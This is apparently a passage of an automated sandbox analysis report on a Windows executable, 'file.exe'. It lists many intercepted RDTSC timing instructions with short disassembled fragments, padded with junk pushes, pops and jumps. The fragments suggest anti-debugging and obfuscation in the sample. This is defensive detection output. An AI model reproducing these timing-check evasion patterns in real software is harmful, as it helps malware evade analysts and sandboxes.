                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639B4F second address: 639B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641F51 second address: 641F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641F57 second address: 641F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6420A5 second address: 6420AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6420AF second address: 6420D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF7h 0x00000007 pushad 0x00000008 jnp 00007F99FD381EE6h 0x0000000e jns 00007F99FD381EE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D5F7 second address: 64D607 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99FCCDC7D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D607 second address: 64D60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEDD second address: 64CEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEE1 second address: 64CEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEE5 second address: 64CEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D046 second address: 64D067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF0h 0x00000009 popad 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F99FD381EE6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D067 second address: 64D06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D1D4 second address: 64D202 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99FD381F00h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F99FD381EF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99FD381EEAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D202 second address: 64D206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7EB8 second address: 5D7EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7EBD second address: 5D7EE5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FCCDC7E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BA6 second address: 655BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BAA second address: 655BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BAE second address: 655BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F99FD381EF5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BD5 second address: 655C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FCCDC7E7h 0x00000009 popad 0x0000000a jmp 00007F99FCCDC7E6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655C07 second address: 655C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655EEA second address: 655EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656182 second address: 656188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656188 second address: 65618E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65618E second address: 65619F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F99FD381EEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65619F second address: 6561C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F99FCCDC7E7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F99FCCDC7D6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656300 second address: 656306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656858 second address: 65685C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656B7E second address: 656B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF5h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656B98 second address: 656BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C6F3 second address: 65C6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99FD381EE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C6FF second address: 65C70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F99FCCDC7DAh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C70E second address: 65C74A instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FD381EFCh 0x00000008 jmp 00007F99FD381EF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99FD381EF6h 0x00000014 jnp 00007F99FD381EE6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C8E2 second address: 65C8F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA35 second address: 65CA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F99FD381EF2h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F99FD381EE6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA58 second address: 65CA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA5C second address: 65CA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CBDB second address: 65CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CD39 second address: 65CD4C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnl 00007F99FD381EE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE75 second address: 65CE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE7B second address: 65CE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EEDh 0x00000009 popad 0x0000000a jmp 00007F99FD381EECh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE99 second address: 65CEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D019 second address: 65D01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D01F second address: 65D04C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F99FCCDC7DEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F99FCCDC7FEh 0x00000018 jmp 00007F99FCCDC7DAh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627314 second address: 627377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12454B32h], edi 0x00000016 mov edx, dword ptr [ebp+122D3905h] 0x0000001c lea eax, dword ptr [ebp+1248707Eh] 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F99FD381EE8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov dx, 7681h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F99FD381EECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627377 second address: 62737B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62737B second address: 627381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627381 second address: 608B36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99FCCDC7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F99FCCDC7E3h 0x00000012 mov dword ptr [ebp+1246AD43h], eax 0x00000018 pop edi 0x00000019 call dword ptr [ebp+122D25C6h] 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627468 second address: 62746D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627579 second address: 627584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F99FCCDC7D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627810 second address: 627815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627815 second address: 473BCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FCCDC7D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dh, FEh 0x0000000f push dword ptr [ebp+122D0B81h] 0x00000015 mov di, bx 0x00000018 call dword ptr [ebp+122D185Bh] 0x0000001e pushad 0x0000001f clc 0x00000020 xor eax, eax 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D3537h], ecx 0x00000029 mov di, 2E5Eh 0x0000002d popad 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 cld 0x00000033 mov dword ptr [ebp+122D37D1h], eax 0x00000039 mov dword ptr [ebp+122D372Fh], ecx 0x0000003f mov esi, 0000003Ch 0x00000044 jmp 00007F99FCCDC7E7h 0x00000049 add esi, dword ptr [esp+24h] 0x0000004d ja 00007F99FCCDC7E1h 0x00000053 lodsw 0x00000055 mov dword ptr [ebp+122D3735h], ecx 0x0000005b add eax, dword ptr [esp+24h] 0x0000005f jmp 00007F99FCCDC7E6h 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 jmp 00007F99FCCDC7E5h 0x0000006d nop 0x0000006e jnl 00007F99FCCDC7F1h 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push esi 0x00000079 pop esi 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627A1F second address: 627A2E instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627B67 second address: 627B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62835E second address: 628363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62849F second address: 6284BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6284BA second address: 6284CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628686 second address: 609679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, ax 0x0000000b call dword ptr [ebp+122D1D1Dh] 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007F99FCCDC7E4h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66139E second address: 6613A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66154C second address: 661554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661554 second address: 66155A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6616AB second address: 6616BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99FCCDC7D6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6616BA second address: 6616CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661841 second address: 661845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661845 second address: 66187F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F99FD381EECh 0x0000000c jmp 00007F99FD381EEAh 0x00000011 popad 0x00000012 push ecx 0x00000013 push edi 0x00000014 jmp 00007F99FD381EF5h 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66187F second address: 661885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661B48 second address: 661B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661CCE second address: 661CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661CD6 second address: 661CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664E54 second address: 664E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66742A second address: 667439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666F93 second address: 666F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A32D second address: 66A347 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FD381EF0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A347 second address: 66A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A34D second address: 66A355 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BB44 second address: 66BB65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 jnl 00007F99FCCDC7D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4932 second address: 5D4947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4947 second address: 5D494C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670D44 second address: 670D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EECh 0x00000009 jmp 00007F99FD381EEEh 0x0000000e popad 0x0000000f jmp 00007F99FD381EEBh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EF0h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670D81 second address: 670D86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6815E4 second address: 6815F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F99FD381EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6815F3 second address: 6815FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FACB second address: 67FAD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FAD7 second address: 67FAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F99FCCDC7E8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FE0A second address: 67FE14 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FD381EF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FE14 second address: 67FE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6800FC second address: 680102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680102 second address: 680108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68099F second address: 6809A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681031 second address: 681035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681035 second address: 68103B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68103B second address: 681044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681044 second address: 68104A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FCD second address: 686FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FD3 second address: 686FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F99FD381EECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FE0 second address: 686FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99FCCDC7DFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FF6 second address: 686FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FFC second address: 687025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 je 00007F99FCCDC7D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F99FCCDC7D6h 0x00000017 rdtsc
